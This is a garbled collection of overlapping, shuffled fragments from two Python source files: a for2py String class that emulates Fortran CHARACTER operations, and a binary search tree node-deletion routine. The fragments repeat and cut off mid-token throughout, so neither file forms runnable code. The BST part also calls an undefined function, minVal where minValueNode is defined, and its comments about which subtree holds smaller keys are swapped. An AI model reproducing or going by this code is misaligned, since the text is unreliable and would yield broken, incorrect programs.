"that the result is the same length as the input string.\"\"\" s =", "def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements", "strings.py Purpose: Code implementing string objects (corresponding to the Fortran CHARACTER type) in", "= len(s) if n < self._length: adjusted = s + self.padding(n) else: adjusted", "a string where substring first occurs; 0 if there is no such occurrence.", "removes leading blanks and adds blanks on the right so that the result", "s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def f_index(self, substring,", "contains \"back\" the string is searched backwards starting from the end.\"\"\" substr =", "pad with blanks k = self._length - n pad_str = \" \" *", "def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String", "j, other): # extract the substring substr = self.value(other)[:(j-i+1)] # construct the new", "end.\"\"\" substr = self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr) else: pos", "assigned to self._val, it may need to be adjusted # if len(value) !=", "else: pos = self._val.find(substr) return pos + 1 def len_trim(self): return len(self._val.rstrip()) def", "self._val.find(substr) return pos + 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return", "Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length", "the same length as the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s))", "function of Fortran's INDEX() function; we use the name f_index to emphasize that", "implements the ADJUSTR() function of Fortran. This function removes trailing blanks and adds", "code generated by for2py. Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\" class", "adds blanks on the left so that the result is the same length", "to self._val, it may need to be adjusted # if len(value) != length", "Before value is assigned to self._val, it may need to be adjusted #", "blanks on the left so that the result is the same length as", "__radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements the", "return len(self._val.rstrip()) def repeat(self, n): return self._val * n def trim(self): return self._val.rstrip()", "self._length - n pad_str = \" \" * k else: pad_str = \"\"", "other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return", "position i (start position = 1) and ending at position j.\"\"\" return self._val[(i-1):j]", "string of blanks of length = sef._length - n.\"\"\" if n < self._length:", "at position i (start position = 1) and ending at position j.\"\"\" return", "self._length self._val = adjusted def __len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\"", "emphasize that the behavior of Fortran's INDEX() is slightly different from that of", "see the document \"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length =", "on the right so that the result is the same length as the", "= len(value) # Before value is assigned to self._val, it may need to", "= 1) and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j,", "length as the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s", "s + self.padding(n) else: adjusted = s[:self._length] # truncate to self._length self._val =", "= self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements", "from the end.\"\"\" substr = self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr)", "that the behavior of Fortran's INDEX() is slightly different from that of Python's", "= self.value(strval) n = len(s) if n < self._length: adjusted = s +", "0 if there is no such occurrence. If the argument direction contains \"back\"", "starting from the end.\"\"\" substr = self.value(substring) if \"back\" in direction: pos =", "new string value newstr = self._val[:(i-1)] + substr + self._val[j:] # update self.set_(newstr)", "string is searched backwards starting from the end.\"\"\" substr = self.value(substring) if \"back\"", "Fortran. This function removes trailing blanks and adds blanks on the left so", "len(value) != length self.set_(value) def value(self, obj): if isinstance(obj, String): return obj._val else:", "returns a string of blanks of length = sef._length - n.\"\"\" if n", "j) returns the substring of the given string beginning at position i (start", "# construct the new string value newstr = self._val[:(i-1)] + substr + self._val[j:]", "get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of the given string beginning", "INDEX() is slightly different from that of Python's index(). f_index() returns the position", "if \"back\" in direction: pos = self._val.rfind(substr) else: pos = self._val.find(substr) return pos", "substring, direction=[]): \"\"\"f_index() implements the string search function of Fortran's INDEX() function; we", "= s[:self._length] # truncate to self._length self._val = adjusted def __len__(self): return self._length", "returns the position within a string where substring first occurs; 0 if there", "INDEX() function; we use the name f_index to emphasize that the behavior of", "self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements the", "with blanks k = self._length - n pad_str = \" \" * k", "< self._length: adjusted = s + self.padding(n) else: adjusted = s[:self._length] # truncate", "# if len(value) != length self.set_(value) def value(self, obj): if isinstance(obj, String): return", "\"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function removes trailing blanks and", "function; we use the name f_index to emphasize that the behavior of Fortran's", "string where substring first occurs; 0 if there is no such occurrence. If", "may need to be adjusted # if len(value) != length self.set_(value) def value(self,", "def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search function of Fortran's INDEX()", "repeat(self, n): return self._val * n def trim(self): return self._val.rstrip() def get_substr(self, i,", "the substring of the given string beginning at position i (start position =", "def __init__(self, length = 0, value = \"\"): if length > 0: self._length", "\"back\" the string is searched backwards starting from the end.\"\"\" substr = self.value(substring)", "pad_str = self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR()", "position within a string where substring first occurs; 0 if there is no", "concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) +", "is no such occurrence. If the argument direction contains \"back\" the string is", "we use the name f_index to emphasize that the behavior of Fortran's INDEX()", "def set_(self, strval): s = self.value(strval) n = len(s) if n < self._length:", "= self._length - n pad_str = \" \" * k else: pad_str =", "self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other):", "self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string", "> 0: self._length = length else: self._length = len(value) # Before value is", "< self._length: # pad with blanks k = self._length - n pad_str =", "s = self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr()", "return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of the", "Fortran's INDEX() function; we use the name f_index to emphasize that the behavior", "else: pad_str = \"\" return pad_str def set_(self, strval): s = self.value(strval) n", "string objects (corresponding to the Fortran CHARACTER type) in the code generated by", "obj): if isinstance(obj, String): return obj._val else: return obj def padding(self, n): \"\"\"padding()", "\"\" return pad_str def set_(self, strval): s = self.value(strval) n = len(s) if", "the position within a string where substring first occurs; 0 if there is", "where substring first occurs; 0 if there is no such occurrence. If the", "padding(self, n): \"\"\"padding() returns a string of blanks of length = sef._length -", "need to be adjusted # if len(value) != length self.set_(value) def value(self, obj):", "the ADJUSTR() function of Fortran. This function removes trailing blanks and adds blanks", "self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of Fortran. This function removes", "direction contains \"back\" the string is searched backwards starting from the end.\"\"\" substr", "trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of", "from that of Python's index(). f_index() returns the position within a string where", "as the input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str +", "pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search function", "and adds blanks on the right so that the result is the same", "+ pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function", "index(). f_index() returns the position within a string where substring first occurs; 0", "pad_str = self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements", "= \"\" return pad_str def set_(self, strval): s = self.value(strval) n = len(s)", "the behavior of Fortran's INDEX() is slightly different from that of Python's index().", "return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search", "+ self.padding(n) else: adjusted = s[:self._length] # truncate to self._length self._val = adjusted", "k = self._length - n pad_str = \" \" * k else: pad_str", "in direction: pos = self._val.rfind(substr) else: pos = self._val.find(substr) return pos + 1", "s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. This", "substring of the given string beginning at position i (start position = 1)", "the string is searched backwards starting from the end.\"\"\" substr = self.value(substring) if", "objects (corresponding to the Fortran CHARACTER type) in the code generated by for2py.", "else: adjusted = s[:self._length] # truncate to self._length self._val = adjusted def __len__(self):", "the document \"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length = 0,", "direction=[]): \"\"\"f_index() implements the string search function of Fortran's INDEX() function; we use", "\"\"\" File: strings.py Purpose: Code implementing string objects (corresponding to the Fortran CHARACTER", "blanks and adds blanks on the right so that the result is the", "ADJUSTR() function of Fortran. This function removes trailing blanks and adds blanks on", "pad_str def set_(self, strval): s = self.value(strval) n = len(s) if n <", "= self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]):", "# pad with blanks k = self._length - n pad_str = \" \"", "def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of Fortran. This function removes leading", "adjusted def __len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val +", "pos + 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val *", "j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): # extract the substring substr", "* n def trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns", "\" \" * k else: pad_str = \"\" return pad_str def set_(self, strval):", "self.value(strval) n = len(s) if n < self._length: adjusted = s + self.padding(n)", "the argument direction contains \"back\" the string is searched backwards starting from the", "= \" \" * k else: pad_str = \"\" return pad_str def set_(self,", "obj def padding(self, n): \"\"\"padding() returns a string of blanks of length =", "= adjusted def __len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val", "within a string where substring first occurs; 0 if there is no such", "name f_index to emphasize that the behavior of Fortran's INDEX() is slightly different", "implementing string objects (corresponding to the Fortran CHARACTER type) in the code generated", "i, j, other): # extract the substring substr = self.value(other)[:(j-i+1)] # construct the", "String: def __init__(self, length = 0, value = \"\"): if length > 0:", "# extract the substring substr = self.value(other)[:(j-i+1)] # construct the new string value", "n): \"\"\"padding() returns a string of blanks of length = sef._length - n.\"\"\"", "def trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring", "n.\"\"\" if n < self._length: # pad with blanks k = self._length -", "blanks on the right so that the result is the same length as", "at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): # extract the", "the input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s", "n pad_str = \" \" * k else: pad_str = \"\" return pad_str", "else: self._length = len(value) # Before value is assigned to self._val, it may", "\"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length = 0, value =", "(corresponding to the Fortran CHARACTER type) in the code generated by for2py. Usage:", "len(self._val.rstrip()) def repeat(self, n): return self._val * n def trim(self): return self._val.rstrip() def", "implements the string search function of Fortran's INDEX() function; we use the name", "set_(self, strval): s = self.value(strval) n = len(s) if n < self._length: adjusted", "the end.\"\"\" substr = self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr) else:", "<filename>delphi/translators/for2py/strings.py \"\"\" File: strings.py Purpose: Code implementing string objects (corresponding to the Fortran", "the substring substr = self.value(other)[:(j-i+1)] # construct the new string value newstr =", "\"\"\"padding() returns a string of blanks of length = sef._length - n.\"\"\" if", "self._length: # pad with blanks k = self._length - n pad_str = \"", "by for2py. Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\" class String: def", "# Before value is assigned to self._val, it may need to be adjusted", "is assigned to self._val, it may need to be adjusted # if len(value)", "substring substr = self.value(other)[:(j-i+1)] # construct the new string value newstr = self._val[:(i-1)]", "return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self,", "of length = sef._length - n.\"\"\" if n < self._length: # pad with", "string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def adjustr(self):", "of blanks of length = sef._length - n.\"\"\" if n < self._length: #", "s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search function of Fortran's", "\"\"): if length > 0: self._length = length else: self._length = len(value) #", "f_index() returns the position within a string where substring first occurs; 0 if", "searched backwards starting from the end.\"\"\" substr = self.value(substring) if \"back\" in direction:", "right so that the result is the same length as the input string.\"\"\"", "- n pad_str = \" \" * k else: pad_str = \"\" return", "self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of", "pos = self._val.find(substr) return pos + 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self,", "= self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the", "0, value = \"\"): if length > 0: self._length = length else: self._length", "be adjusted # if len(value) != length self.set_(value) def value(self, obj): if isinstance(obj,", "= 0, value = \"\"): if length > 0: self._length = length else:", "on the left so that the result is the same length as the", "different from that of Python's index(). f_index() returns the position within a string", "adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function removes trailing blanks", "Purpose: Code implementing string objects (corresponding to the Fortran CHARACTER type) in the", "the result is the same length as the input string.\"\"\" s = self._val.rstrip()", "length as the input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str", "argument direction contains \"back\" the string is searched backwards starting from the end.\"\"\"", "the ADJUSTL() function of Fortran. This function removes leading blanks and adds blanks", "+ 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val * n", "the result is the same length as the input string.\"\"\" s = self._val.lstrip()", "position = 1) and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i,", "to be adjusted # if len(value) != length self.set_(value) def value(self, obj): if", "so that the result is the same length as the input string.\"\"\" s", "= s + self.padding(n) else: adjusted = s[:self._length] # truncate to self._length self._val", "return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val", "and adds blanks on the left so that the result is the same", "the given string beginning at position i (start position = 1) and ending", "CHARACTER type) in the code generated by for2py. Usage: see the document \"for2py:", "return obj._val else: return obj def padding(self, n): \"\"\"padding() returns a string of", "of Fortran's INDEX() is slightly different from that of Python's index(). f_index() returns", "self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index()", "len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val * n def trim(self): return", "__init__(self, length = 0, value = \"\"): if length > 0: self._length =", "input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def", "substring first occurs; 0 if there is no such occurrence. If the argument", "1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val * n def", "blanks of length = sef._length - n.\"\"\" if n < self._length: # pad", "pos = self._val.rfind(substr) else: pos = self._val.find(substr) return pos + 1 def len_trim(self):", "same length as the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return", "= self.value(other)[:(j-i+1)] # construct the new string value newstr = self._val[:(i-1)] + substr", "- n.\"\"\" if n < self._length: # pad with blanks k = self._length", "to self._length self._val = adjusted def __len__(self): return self._length def __add__(self, other): \"\"\"String", "of Fortran's INDEX() function; we use the name f_index to emphasize that the", "substr = self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr) else: pos =", "other): # extract the substring substr = self.value(other)[:(j-i+1)] # construct the new string", "length = sef._length - n.\"\"\" if n < self._length: # pad with blanks", "def padding(self, n): \"\"\"padding() returns a string of blanks of length = sef._length", "as the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s +", "len(value) # Before value is assigned to self._val, it may need to be", "slightly different from that of Python's index(). f_index() returns the position within a", "such occurrence. If the argument direction contains \"back\" the string is searched backwards", "type) in the code generated by for2py. Usage: see the document \"for2py: Miscellaneous", "value = \"\"): if length > 0: self._length = length else: self._length =", "the same length as the input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s))", "s = self.value(strval) n = len(s) if n < self._length: adjusted = s", "self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of Fortran. This", "Fortran's INDEX() is slightly different from that of Python's index(). f_index() returns the", "class String: def __init__(self, length = 0, value = \"\"): if length >", "n = len(s) if n < self._length: adjusted = s + self.padding(n) else:", "of Fortran. This function removes leading blanks and adds blanks on the right", "This function removes leading blanks and adds blanks on the right so that", "return self._val * n def trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i,", "behavior of Fortran's INDEX() is slightly different from that of Python's index(). f_index()", "self._val = adjusted def __len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return", "returns the substring of the given string beginning at position i (start position", "newstr = self._val[:(i-1)] + substr + self._val[j:] # update self.set_(newstr) def __str__(self): return", "adjusted = s + self.padding(n) else: adjusted = s[:self._length] # truncate to self._length", "s[:self._length] # truncate to self._length self._val = adjusted def __len__(self): return self._length def", "function of Fortran. This function removes trailing blanks and adds blanks on the", "self._length = len(value) # Before value is assigned to self._val, it may need", "j): \"\"\"get_substr(i, j) returns the substring of the given string beginning at position", "i, j): \"\"\"get_substr(i, j) returns the substring of the given string beginning at", "return self._val[(i-1):j] def set_substr(self, i, j, other): # extract the substring substr =", "= sef._length - n.\"\"\" if n < self._length: # pad with blanks k", "value(self, obj): if isinstance(obj, String): return obj._val else: return obj def padding(self, n):", "File: strings.py Purpose: Code implementing string objects (corresponding to the Fortran CHARACTER type)", "the string search function of Fortran's INDEX() function; we use the name f_index", "leading blanks and adds blanks on the right so that the result is", "length self.set_(value) def value(self, obj): if isinstance(obj, String): return obj._val else: return obj", "+ s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search function of", "\"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function", "of Fortran. This function removes trailing blanks and adds blanks on the left", "given string beginning at position i (start position = 1) and ending at", "self.value(other)[:(j-i+1)] # construct the new string value newstr = self._val[:(i-1)] + substr +", "\"back\" in direction: pos = self._val.rfind(substr) else: pos = self._val.find(substr) return pos +", "is the same length as the input string.\"\"\" s = self._val.rstrip() pad_str =", "self.set_(value) def value(self, obj): if isinstance(obj, String): return obj._val else: return obj def", "self._val[(i-1):j] def set_substr(self, i, j, other): # extract the substring substr = self.value(other)[:(j-i+1)]", "length > 0: self._length = length else: self._length = len(value) # Before value", "adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of Fortran. This function removes leading blanks", "self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def", "= self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr) else: pos = self._val.find(substr)", "of the given string beginning at position i (start position = 1) and", "direction: pos = self._val.rfind(substr) else: pos = self._val.find(substr) return pos + 1 def", "def value(self, obj): if isinstance(obj, String): return obj._val else: return obj def padding(self,", "concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of", "the name f_index to emphasize that the behavior of Fortran's INDEX() is slightly", "search function of Fortran's INDEX() function; we use the name f_index to emphasize", "constructs\" \"\"\" class String: def __init__(self, length = 0, value = \"\"): if", "return pos + 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val", "length = 0, value = \"\"): if length > 0: self._length = length", "of Python's index(). f_index() returns the position within a string where substring first", "for2py. Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self,", "\" * k else: pad_str = \"\" return pad_str def set_(self, strval): s", "generated by for2py. Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\" class String:", "0: self._length = length else: self._length = len(value) # Before value is assigned", "n < self._length: adjusted = s + self.padding(n) else: adjusted = s[:self._length] #", "string search function of Fortran's INDEX() function; we use the name f_index to", "ADJUSTL() function of Fortran. This function removes leading blanks and adds blanks on", "function of Fortran. This function removes leading blanks and adds blanks on the", "function removes leading blanks and adds blanks on the right so that the", "= length else: self._length = len(value) # Before value is assigned to self._val,", "n < self._length: # pad with blanks k = self._length - n pad_str", "function removes trailing blanks and adds blanks on the left so that the", "self._val.rfind(substr) else: pos = self._val.find(substr) return pos + 1 def len_trim(self): return len(self._val.rstrip())", "self._length: adjusted = s + self.padding(n) else: adjusted = s[:self._length] # truncate to", "self._val, it may need to be adjusted # if len(value) != length self.set_(value)", "return obj def padding(self, n): \"\"\"padding() returns a string of blanks of length", "= \"\"): if length > 0: self._length = length else: self._length = len(value)", "+ self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of Fortran. This function", "first occurs; 0 if there is no such occurrence. If the argument direction", "if length > 0: self._length = length else: self._length = len(value) # Before", "backwards starting from the end.\"\"\" substr = self.value(substring) if \"back\" in direction: pos", "Code implementing string objects (corresponding to the Fortran CHARACTER type) in the code", "result is the same length as the input string.\"\"\" s = self._val.lstrip() pad_str", "it may need to be adjusted # if len(value) != length self.set_(value) def", "adjusted = s[:self._length] # truncate to self._length self._val = adjusted def __len__(self): return", "no such occurrence. If the argument direction contains \"back\" the string is searched" ]
[ "< root.data: root.left = deleteNode(root.left, key) # If the key to be deleted", "nodes exists, get the inorder successor root.data = v.data root.right = deleteNode(root.right, v.data)", "If the key to be deleted is smaller than the root's # key", "current = current.left return current def deleteNode(root, key): if root == None: return", "when there is only one child of the root or no child v", "= root # loop down to find the leftmost leaf while(current.left is not", "to be deleted if root.left == None: tmp = root.right root = None", "= minVal(root.right) # When both nodes exists, get the inorder successor root.data =", "cases when there is only one child of the root or no child", "the key to be deleted is smaller than the root's # key then", "tmp = root.right root = None return tmp elif root.right == None: tmp", "deleted is smaller than the root's # key then it lies in left", "loop down to find the leftmost leaf while(current.left is not None): current =", "root.left = deleteNode(root.left, key) # If the key to be deleted is smaller", "smaller than the root's # key then it lies in left subtree elif", "higher node as per the inorder traversal \"\"\" current = root # loop", "be deleted is smaller than the root's # key then it lies in", "successor or the next higher node as per the inorder traversal \"\"\" current", "root = None return tmp elif root.right == None: tmp = root.left root", "node to be deleted if root.left == None: tmp = root.right root =", "it lies in right part else: # The key is same as root's", "# Convers cases when there is only one child of the root or", "root.data: root.right = deleteNode(root.right, key) # If the key to be deleted is", "= deleteNode(root.right, key) # If the key to be deleted is greater than", "root.right == None: tmp = root.left root = None return tmp # Convers", "# key then it lies in right part else: # The key is", "lies in left subtree elif key > root.data: root.right = deleteNode(root.right, key) #", "\"\"\" current = root # loop down to find the leftmost leaf while(current.left", "root.left root = None return tmp # Convers cases when there is only", "\"\"\" Returns the iorder successor or the next higher node as per the", "= deleteNode(root.left, key) # If the key to be deleted is smaller than", "be deleted if root.left == None: tmp = root.right root = None return", "def minValueNode(root): \"\"\" Returns the iorder successor or the next higher node as", "key then it lies in right part else: # The key is same", "None: tmp = root.right root = None return tmp elif root.right == None:", "# loop down to find the leftmost leaf while(current.left is not None): current", "#!/usr/bin/python3 # https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1 def minValueNode(root): \"\"\" Returns the iorder successor or the next", "while(current.left is not None): current = current.left return current def deleteNode(root, key): if", "def deleteNode(root, key): if root == None: return if key < root.data: root.left", "part else: # The key is same as root's key, then this is", "child v = minVal(root.right) # When both nodes exists, get the inorder successor", "= root.right root = None return tmp elif root.right == None: tmp =", "elif key > root.data: root.right = deleteNode(root.right, key) # If the key to", "to be deleted is smaller than the root's # key then it lies", "both nodes exists, get the inorder successor root.data = v.data root.right = deleteNode(root.right,", "in right part else: # The key is same as root's key, then", "# The key is same as root's key, then this is the node", "inorder successor root.data = v.data root.right = deleteNode(root.right, v.data) # Delete the inorder", "child of the root or no child v = minVal(root.right) # When both", "root == None: return if key < root.data: root.left = deleteNode(root.left, key) #", "leftmost leaf while(current.left is not None): current = current.left return current def deleteNode(root,", "root's key, then this is the node to be deleted if root.left ==", "to find the leftmost leaf while(current.left is not None): current = current.left return", "deleteNode(root.left, key) # If the key to be deleted is smaller than the", "deleteNode(root.right, key) # If the key to be deleted is greater than the", "in left subtree elif key > root.data: root.right = deleteNode(root.right, key) # If", "key < root.data: root.left = deleteNode(root.left, key) # If the key to be", "== None: tmp = root.right root = None return tmp elif root.right ==", "then it lies in right part else: # The key is same as", "deleted if root.left == None: tmp = root.right root = None return tmp", "if root.left == None: tmp = root.right root = None return tmp elif", "be deleted is greater than the root's # key then it lies in", "= current.left return current def deleteNode(root, key): if root == None: return if", "if root == None: return if key < root.data: root.left = deleteNode(root.left, key)", "as per the inorder traversal \"\"\" current = root # loop down to", "is greater than the root's # key then it lies in right part", "the inorder traversal \"\"\" current = root # loop down to find the", "the root's # key then it lies in left subtree elif key >", "the root or no child v = minVal(root.right) # When both nodes exists,", "the iorder successor or the next higher node as per the inorder traversal", "== None: tmp = root.left root = None return tmp # Convers cases", "return if key < root.data: root.left = deleteNode(root.left, key) # If the key", "left subtree elif key > root.data: root.right = deleteNode(root.right, key) # If the", "minValueNode(root): \"\"\" Returns the iorder successor or the next higher node as per", "= None return tmp # Convers cases when there is only one child", "exists, get the inorder successor root.data = v.data root.right = deleteNode(root.right, v.data) #", "the inorder successor root.data = v.data root.right = deleteNode(root.right, v.data) # Delete the", "None return tmp elif root.right == None: tmp = root.left root = None", "current = root # loop down to find the leftmost leaf while(current.left is", "key to be deleted is smaller than the root's # key then it", "find the leftmost leaf while(current.left is not None): current = current.left return current", "lies in right part else: # The key is same as root's key,", "as root's key, then this is the node to be deleted if root.left", "key, then this is the node to be deleted if root.left == None:", "it lies in left subtree elif key > root.data: root.right = deleteNode(root.right, key)", "get the inorder successor root.data = v.data root.right = deleteNode(root.right, v.data) # Delete", "Returns the iorder successor or the next higher node as per the inorder", "<filename>functional-problems/deleteNodeFromBst.py #!/usr/bin/python3 # https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1 def minValueNode(root): \"\"\" Returns the iorder successor or the", "root.right root = None return tmp elif root.right == None: tmp = root.left", "None: tmp = root.left root = None return tmp # Convers cases when", "right part else: # The key is same as root's key, then this", "or no child v = minVal(root.right) # When both nodes exists, get the", "no child v = minVal(root.right) # When both nodes exists, get the inorder", "# https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1 def minValueNode(root): \"\"\" Returns the iorder successor or the next higher", "root # loop down to find the leftmost leaf while(current.left is not None):", "not None): current = current.left return current def deleteNode(root, key): if root ==", "only one child of the root or no child v = minVal(root.right) #", "key to be deleted is greater than the root's # key then it", "None): current = current.left return current def deleteNode(root, key): if root == None:", "if key < root.data: root.left = deleteNode(root.left, key) # If the key to", "one child of the root or no child v = minVal(root.right) # When", "of the root or no child v = minVal(root.right) # When both nodes", "minVal(root.right) # When both nodes exists, get the inorder successor root.data = v.data", "key then it lies in left subtree elif key > root.data: root.right =", "or the next higher node as per the inorder traversal \"\"\" current =", "= root.left root = None return tmp # Convers cases when there is", "the leftmost leaf while(current.left is not None): current = current.left return current def", "the root's # key then it lies in right part else: # The", "subtree elif key > root.data: root.right = deleteNode(root.right, key) # If the key", "next higher node as per the inorder traversal \"\"\" current = root #", "return current def deleteNode(root, key): if root == None: return if key <", "root.right = deleteNode(root.right, key) # If the key to be deleted is greater", "tmp = root.left root = None return tmp # Convers cases when there", "per the inorder traversal \"\"\" current = root # loop down to find", "key > root.data: root.right = deleteNode(root.right, key) # If the key to be", "this is the node to be deleted if root.left == None: tmp =", "than the root's # key then it lies in right part else: #", "successor root.data = v.data root.right = deleteNode(root.right, v.data) # Delete the inorder successor", "None return tmp # Convers cases when there is only one child of", "key) # If the key to be deleted is smaller than the root's", "# key then it lies in left subtree elif key > root.data: root.right", "None: return if key < root.data: root.left = deleteNode(root.left, key) # If the", "key is same as root's key, then this is the node to be", "deleted is greater than the root's # key then it lies in right", "leaf while(current.left is not None): current = current.left return current def deleteNode(root, key):", "root's # key then it lies in left subtree elif key > root.data:", "root.data = v.data root.right = deleteNode(root.right, v.data) # Delete the inorder successor return", "root.left == None: tmp = root.right root = None return tmp elif root.right", "root's # key then it lies in right part else: # The key", "elif root.right == None: tmp = root.left root = None return tmp #", "than the root's # key then it lies in left subtree elif key", "root or no child v = minVal(root.right) # When both nodes exists, get", "> root.data: root.right = deleteNode(root.right, key) # If the key to be deleted", "traversal \"\"\" current = root # loop down to find the leftmost leaf", "return tmp # Convers cases when there is only one child of the", "# When both nodes exists, get the inorder successor root.data = v.data root.right", "else: # The key is same as root's key, then this is the", "root.data: root.left = deleteNode(root.left, key) # If the key to be deleted is", "= None return tmp elif root.right == None: tmp = root.left root =", "is smaller than the root's # key then it lies in left subtree", "inorder traversal \"\"\" current = root # loop down to find the leftmost", "then this is the node to be deleted if root.left == None: tmp", "The key is same as root's key, then this is the node to", "node as per the inorder traversal \"\"\" current = root # loop down", "key): if root == None: return if key < root.data: root.left = deleteNode(root.left,", "https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1 def minValueNode(root): \"\"\" Returns the iorder successor or the next higher node", "tmp # Convers cases when there is only one child of the root", "to be deleted is greater than the root's # key then it lies", "# If the key to be deleted is smaller than the root's #", "is not None): current = current.left return current def deleteNode(root, key): if root", "# If the key to be deleted is greater than the root's #", "is same as root's key, then this is the node to be deleted", "Convers cases when there is only one child of the root or no", "root = None return tmp # Convers cases when there is only one", "If the key to be deleted is greater than the root's # key", "is the node to be deleted if root.left == None: tmp = root.right", "then it lies in left subtree elif key > root.data: root.right = deleteNode(root.right,", "is only one child of the root or no child v = minVal(root.right)", "key) # If the key to be deleted is greater than the root's", "When both nodes exists, get the inorder successor root.data = v.data root.right =", "the node to be deleted if root.left == None: tmp = root.right root", "down to find the leftmost leaf while(current.left is not None): current = current.left", "the key to be deleted is greater than the root's # key then", "current def deleteNode(root, key): if root == None: return if key < root.data:", "current.left return current def deleteNode(root, key): if root == None: return if key", "v = minVal(root.right) # When both nodes exists, get the inorder successor root.data", "return tmp elif root.right == None: tmp = root.left root = None return", "greater than the root's # key then it lies in right part else:", "= v.data root.right = 